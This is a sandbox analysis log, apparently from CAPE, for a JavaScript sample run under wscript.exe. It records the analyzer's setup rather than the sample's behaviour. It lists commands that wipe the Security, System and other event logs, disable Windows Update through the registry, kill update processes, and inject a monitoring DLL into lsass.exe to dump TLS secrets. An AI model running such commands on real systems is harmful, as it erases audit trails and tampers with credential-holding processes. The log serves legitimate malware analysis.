Analysis

Category: FILE
Package: js
Started: 2025-12-08 16:32:32
Completed: 2025-12-08 16:35:55
Duration: 203 seconds
Options: vnc_port=5902
MalScore: 4.4

Analysis log:
2025-12-06 09:30:10,735 [root] INFO: Date set to: 20251208T08:31:09, timeout set to: 180
2025-12-08 08:31:09,000 [root] DEBUG: Starting analyzer from: C:\tmpxury4kjh
2025-12-08 08:31:09,000 [root] DEBUG: Storing results at: C:\izVIbM
2025-12-08 08:31:09,000 [root] DEBUG: Pipe server name: \\.\PIPE\kpRijuZscx
2025-12-08 08:31:09,000 [root] DEBUG: Python path: C:\Python38
2025-12-08 08:31:09,000 [root] INFO: analysis running as an admin
2025-12-08 08:31:09,000 [root] INFO: analysis package specified: "js"
2025-12-08 08:31:09,000 [root] DEBUG: importing analysis package module: "modules.packages.js"...
2025-12-08 08:31:09,015 [root] DEBUG: imported analysis package "js"
2025-12-08 08:31:09,015 [root] DEBUG: initializing analysis package "js"...
2025-12-08 08:31:09,015 [lib.common.common] INFO: wrapping
2025-12-08 08:31:09,015 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:09,015 [root] DEBUG: New location of moved file: C:\Users\user\AppData\Local\Temp\testjs.js
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a DLL_64 option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader option
2025-12-08 08:31:09,015 [root] INFO: Analyzer: Package modules.packages.js does not specify a loader_64 option
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain"
2025-12-08 08:31:09,046 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.during_script"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.end_noisy_tasks"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.evtx"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human"
2025-12-08 08:31:09,062 [root] DEBUG: Imported auxiliary module "modules.auxiliary.pre_script"
2025-12-08 08:31:09,062 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2025-12-08 08:31:09,093 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots"
2025-12-08 08:31:09,109 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.tlsdump"
2025-12-08 08:31:09,281 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage"
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Browser"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Browser' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Browser does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.browser"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.browser
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Curtain"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Curtain' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Curtain does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.curtain"...
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.curtain
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Disguise"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Disguise' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Disguise does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.disguise"...
2025-12-08 08:31:09,281 [modules.auxiliary.disguise] INFO: Disguising GUID to 4cd86de3-d3ab-4183-8f30-4cb63b155e73
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "End_noisy_tasks"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'End_noisy_tasks' from data
2025-12-08 08:31:09,281 [root] DEBUG: module End_noisy_tasks does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.end_noisy_tasks"...
2025-12-08 08:31:09,281 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wuauclt.exe
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.end_noisy_tasks
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Evtx"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Evtx' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Evtx does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.evtx"...
2025-12-08 08:31:09,281 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security State Change" /success:enable /failure:enable
2025-12-08 08:31:09,281 [root] DEBUG: Started auxiliary module modules.auxiliary.evtx
2025-12-08 08:31:09,281 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 08:31:09,281 [root] DEBUG: attempting to configure 'Human' from data
2025-12-08 08:31:09,281 [root] DEBUG: module Human does not support data configuration, ignoring
2025-12-08 08:31:09,281 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.human"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.human
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Pre_script"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Pre_script' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Pre_script does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.pre_script"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.pre_script
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Screenshots' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Screenshots does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 08:31:09,312 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots
2025-12-08 08:31:09,312 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 08:31:09,312 [root] DEBUG: attempting to configure 'Sysmon' from data
2025-12-08 08:31:09,312 [root] DEBUG: module Sysmon does not support data configuration, ignoring
2025-12-08 08:31:09,312 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 08:31:09,375 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security System Extension" /success:enable /failure:enable
2025-12-08 08:31:09,421 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"System Integrity" /success:enable /failure:enable
2025-12-08 08:31:09,421 [root] WARNING: Cannot execute auxiliary module modules.auxiliary.sysmon: In order to use the Sysmon functionality, it is required to have the SMaster(64|32).exe file and sysmonconfig-export.xml file in the bin path. Note that the SMaster(64|32).exe files are just the standard Sysmon binaries renamed to avoid anti-analysis detection techniques.
2025-12-08 08:31:09,421 [root] DEBUG: Initialized auxiliary module "TLSDumpMasterSecrets"
2025-12-08 08:31:09,421 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data
2025-12-08 08:31:09,421 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring
2025-12-08 08:31:09,421 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.tlsdump"...
2025-12-08 08:31:09,421 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 392
2025-12-08 08:31:09,421 [lib.api.process] INFO: Monitor config for <Process 392 lsass.exe>: C:\tmpxury4kjh\dll\392.ini
2025-12-08 08:31:09,421 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor
2025-12-08 08:31:09,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:09,437 [root] DEBUG: Loader: Injecting process 392 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,453 [root] DEBUG: 392: Python path set to 'C:\Python38'.
2025-12-08 08:31:09,453 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:09,468 [root] DEBUG: 392: TLS secret dump mode enabled.
2025-12-08 08:31:09,468 [root] DEBUG: 392: Monitor initialised: 32-bit capemon loaded in process 392 at 0x6c9a0000, thread 3136, image base 0x570000, stack from 0x1066000-0x1070000
2025-12-08 08:31:09,468 [root] DEBUG: 392: Commandline: C:\Windows\system32\lsass.exe
2025-12-08 08:31:09,468 [root] DEBUG: 392: Hooked 5 out of 5 functions
2025-12-08 08:31:09,468 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:09,468 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Driver" /success:disable /failure:disable
2025-12-08 08:31:09,468 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:09,484 [lib.api.process] INFO: Injected into 32-bit <Process 392 lsass.exe>
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "Usage"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'Usage' from data
2025-12-08 08:31:09,484 [root] DEBUG: module Usage does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.usage"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.usage
2025-12-08 08:31:09,484 [root] DEBUG: Initialized auxiliary module "During_script"
2025-12-08 08:31:09,484 [root] DEBUG: attempting to configure 'During_script' from data
2025-12-08 08:31:09,484 [root] DEBUG: module During_script does not support data configuration, ignoring
2025-12-08 08:31:09,484 [root] DEBUG: Trying to start auxiliary module "modules.auxiliary.during_script"...
2025-12-08 08:31:09,484 [root] DEBUG: Started auxiliary module modules.auxiliary.during_script
2025-12-08 08:31:09,484 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM wusa.exe
2025-12-08 08:31:09,500 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other System Events" /success:disable /failure:enable
2025-12-08 08:31:09,531 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logon" /success:enable /failure:enable
2025-12-08 08:31:09,562 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM WindowsUpdate.exe
2025-12-08 08:31:09,562 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Logoff" /success:enable /failure:enable
2025-12-08 08:31:09,578 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Account Lockout" /success:enable /failure:enable
2025-12-08 08:31:09,593 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM GoogleUpdate.exe
2025-12-08 08:31:09,609 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Main Mode" /success:disable /failure:disable
2025-12-08 08:31:09,625 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Quick Mode" /success:disable /failure:disable
2025-12-08 08:31:09,640 [modules.auxiliary.end_noisy_tasks] DEBUG: taskkill /f /IM MicrosoftEdgeUpdate.exe
2025-12-08 08:31:09,640 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"IPsec Extended Mode" /success:disable /failure:disable
2025-12-08 08:31:09,656 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Logon/Logoff Events" /success:enable /failure:enable
2025-12-08 08:31:09,687 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Network Policy Server" /success:enable /failure:enable
2025-12-08 08:31:09,703 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f
2025-12-08 08:31:09,703 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Special Logon" /success:enable /failure:enable
2025-12-08 08:31:09,718 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v AllowTelemetry /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,718 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File System" /success:enable /failure:enable
2025-12-08 08:31:09,734 [modules.auxiliary.end_noisy_tasks] DEBUG: Command executed with exit code 0: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v EnableICMPRedirect /t REG_DWORD /d 0 /f
2025-12-08 08:31:09,750 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Registry" /success:enable /failure:enable
2025-12-08 08:31:09,765 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kernel Object" /success:enable /failure:enable
2025-12-08 08:31:09,781 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"SAM" /success:disable /failure:disable
2025-12-08 08:31:09,796 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
2025-12-08 08:31:09,812 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Handle Manipulation" /success:disable /failure:disable
2025-12-08 08:31:09,828 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Generated" /success:enable /failure:enable
2025-12-08 08:31:09,843 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"File Share" /success:enable /failure:enable
2025-12-08 08:31:09,859 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Packet Drop" /success:disable /failure:disable
2025-12-08 08:31:09,875 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Connection" /success:disable /failure:disable
2025-12-08 08:31:09,890 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Object Access Events" /success:disable /failure:disable
2025-12-08 08:31:09,906 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,921 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Non Sensitive Privilege Use" /success:disable /failure:disable
2025-12-08 08:31:09,937 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Privilege Use Events" /success:disable /failure:disable
2025-12-08 08:31:09,953 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"RPC Events" /success:enable /failure:enable
2025-12-08 08:31:09,968 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Audit Policy Change" /success:enable /failure:enable
2025-12-08 08:31:09,984 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Authentication Policy Change" /success:enable /failure:enable
2025-12-08 08:31:10,000 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"MPSSVC Rule-Level Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,015 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Filtering Platform Policy Change" /success:disable /failure:disable
2025-12-08 08:31:10,031 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Policy Change Events" /success:disable /failure:enable
2025-12-08 08:31:10,046 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"User Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,062 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Computer Account Management" /success:enable /failure:enable
2025-12-08 08:31:10,078 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Security Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,093 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Distribution Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,109 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Application Group Management" /success:enable /failure:enable
2025-12-08 08:31:10,125 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Management Events" /success:enable /failure:enable
2025-12-08 08:31:10,140 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Access" /success:enable /failure:enable
2025-12-08 08:31:10,156 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
2025-12-08 08:31:10,171 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Directory Service Replication" /success:disable /failure:enable
2025-12-08 08:31:10,187 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Detailed Directory Service Replication" /success:disable /failure:disable
2025-12-08 08:31:10,203 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Credential Validation" /success:enable /failure:enable
2025-12-08 08:31:10,218 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
2025-12-08 08:31:10,234 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Other Account Logon Events" /success:enable /failure:enable
2025-12-08 08:31:10,249 [modules.auxiliary.evtx] DEBUG: Enabling advanced logging -> auditpol /set /subcategory:"Kerberos Authentication Service" /success:enable /failure:enable
2025-12-08 08:31:10,265 [modules.auxiliary.evtx] DEBUG: Wiping Application
2025-12-08 08:31:10,281 [modules.auxiliary.evtx] DEBUG: Wiping HardwareEvents
2025-12-08 08:31:10,296 [modules.auxiliary.evtx] DEBUG: Wiping Internet Explorer
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping Key Management Service
2025-12-08 08:31:10,312 [modules.auxiliary.evtx] DEBUG: Wiping OAlerts
2025-12-08 08:31:10,328 [modules.auxiliary.evtx] DEBUG: Wiping Security
2025-12-08 08:31:10,343 [modules.auxiliary.evtx] DEBUG: Wiping Setup
2025-12-08 08:31:10,359 [modules.auxiliary.evtx] DEBUG: Wiping System
2025-12-08 08:31:10,375 [modules.auxiliary.evtx] DEBUG: Wiping Windows PowerShell
2025-12-08 08:31:10,390 [modules.auxiliary.evtx] DEBUG: Wiping Microsoft-Windows-Sysmon/Operational
2025-12-08 08:31:14,656 [root] INFO: Restarting WMI Service
2025-12-08 08:31:16,687 [root] DEBUG: package modules.packages.js does not support configure, ignoring
2025-12-08 08:31:16,687 [root] WARNING: configuration error for package modules.packages.js: error importing data.packages.js: No module named 'data.packages'
2025-12-08 08:31:16,687 [lib.core.compound] INFO: C:\Users\user\AppData\Local\Temp already exists, skipping creation
2025-12-08 08:31:16,687 [lib.api.process] INFO: Successfully executed process from path "C:\Windows\system32\wscript.exe" with arguments ""C:\Users\user\AppData\Local\Temp\testjs.js"" with pid 3016
2025-12-08 08:31:16,687 [lib.api.process] INFO: Monitor config for <Process 3016 wscript.exe>: C:\tmpxury4kjh\dll\3016.ini
2025-12-08 08:31:16,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:16,703 [root] DEBUG: Loader: Injecting process 3016 (thread 3052) with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 08:31:16,703 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:16,703 [lib.api.process] INFO: Injected into 32-bit <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [lib.api.process] INFO: Successfully resumed <Process 3016 wscript.exe>
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,703 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,703 [root] DEBUG: 3016: wscript hook set enabled
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled 41 rule files
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraInit: Compiled rules saved to file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,703 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,703 [root] DEBUG: 3016: Monitor initialised: 32-bit capemon loaded in process 3016 at 0x6c9a0000, thread 3052, image base 0x2e0000, stack from 0x206000-0x210000
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Commandline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Local\Temp\testjs.js"
2025-12-08 08:31:18,718 [root] DEBUG: 3016: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,718 [root] DEBUG: 3016: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,718 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,718 [root] DEBUG: 3016: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,718 [root] DEBUG: 3016: Hooked 611 out of 613 functions
2025-12-08 08:31:18,718 [root] DEBUG: 3016: WoW64 not detected.
2025-12-08 08:31:18,734 [root] INFO: Loaded monitor into process with pid 3016
2025-12-08 08:31:18,734 [root] DEBUG: 3016: caller_dispatch: Added region at 0x002E0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x002E3DA7, thread 3052).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: YaraScan: Scanning 0x002E0000, size 0x253d4
2025-12-08 08:31:18,734 [root] DEBUG: 3016: ProcessImageBase: Main module image at 0x002E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753E0000: C:\Windows\system32\CRYPTBASE (0xc000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x74170000: C:\Windows\system32\uxtheme (0x40000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x753F0000: C:\Windows\system32\SXS (0x5f000 bytes).
2025-12-08 08:31:18,734 [root] DEBUG: 3016: DLL loaded at 0x73E80000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x76100000: C:\Windows\system32\CLBCatQ (0x83000 bytes).
2025-12-08 08:31:18,750 [root] DEBUG: 3016: DLL loaded at 0x6CC90000: C:\Windows\System32\jscript (0xa6000 bytes).
2025-12-08 08:31:18,750 [lib.api.process] INFO: Monitor config for <Process 556 svchost.exe>: C:\tmpxury4kjh\dll\556.ini
2025-12-08 08:31:18,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpxury4kjh\dll\yrjhZcK.dll, loader C:\tmpxury4kjh\bin\RVmCpJY.exe
2025-12-08 08:31:18,750 [root] DEBUG: Loader: Injecting process 556 with C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Python path set to 'C:\Python38'.
2025-12-08 08:31:18,765 [root] INFO: Disabling sleep skipping.
2025-12-08 08:31:18,765 [root] DEBUG: 556: Dropped file limit defaulting to 100.
2025-12-08 08:31:18,765 [root] DEBUG: 556: parent_has_path: unable to get path for parent process 376
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraInit: Compiled rules loaded from existing file C:\tmpxury4kjh\data\yara\capemon.yac
2025-12-08 08:31:18,765 [root] DEBUG: 556: YaraScan: Scanning 0x00F00000, size 0x73ca
2025-12-08 08:31:18,765 [root] DEBUG: 556: Monitor initialised: 32-bit capemon loaded in process 556 at 0x6c9a0000, thread 3376, image base 0xf00000, stack from 0xc36000-0xc40000
2025-12-08 08:31:18,765 [root] DEBUG: 556: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch
2025-12-08 08:31:18,765 [root] DEBUG: 556: GetAddressByYara: ModuleBase 0x774E0000 FunctionName LdrpCallInitRoutine
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: LdrpCallInitRoutine export address 0x77538810 obtained via GetFunctionAddress
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - CreateRemoteThreadEx export address 0x764AF98F differs from GetProcAddress -> 0x754EBB18 (KERNELBASE.dll::0xbb18)
2025-12-08 08:31:18,765 [root] DEBUG: 556: hook_api: Warning - UpdateProcThreadAttribute export address 0x764B020F differs from GetProcAddress -> 0x754F43FB (KERNELBASE.dll::0x143fb)
2025-12-08 08:31:18,765 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 08:31:18,765 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineA
2025-12-08 08:31:18,781 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 08:31:18,781 [root] DEBUG: 556: set_hooks: Unable to hook GetCommandLineW
2025-12-08 08:31:18,781 [root] DEBUG: 556: Hooked 611 out of 613 functions
2025-12-08 08:31:18,781 [root] DEBUG: 556: WoW64 not detected.
2025-12-08 08:31:18,781 [root] INFO: Loaded monitor into process with pid 556
2025-12-08 08:31:18,781 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 08:31:18,781 [root] DEBUG: Successfully injected DLL C:\tmpxury4kjh\dll\yrjhZcK.dll.
2025-12-08 08:31:18,781 [lib.api.process] INFO: Injected into 32-bit <Process 556 svchost.exe>
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x75630000: C:\Windows\system32\WINTRUST (0x2f000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74ED0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x74C60000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x73AC0000: C:\Windows\system32\MSISIP (0x8000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x72740000: C:\Windows\system32\wshext (0x16000 bytes).
2025-12-08 08:31:20,781 [root] DEBUG: 3016: DLL loaded at 0x721D0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32 (0x84000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x766D0000: C:\Windows\system32\SHELL32 (0xc4c000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x71CF0000: C:\Windows\system32\scrobj (0x2d000 bytes).
2025-12-08 08:31:20,843 [root] DEBUG: 3016: DLL loaded at 0x75450000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2025-12-08 08:31:20,890 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 3592, handle 0x5f8: C:\Windows\System32\audiodg.exe
2025-12-08 08:31:20,906 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 396, handle 0x5f0: C:\Windows\System32\taskhost.exe
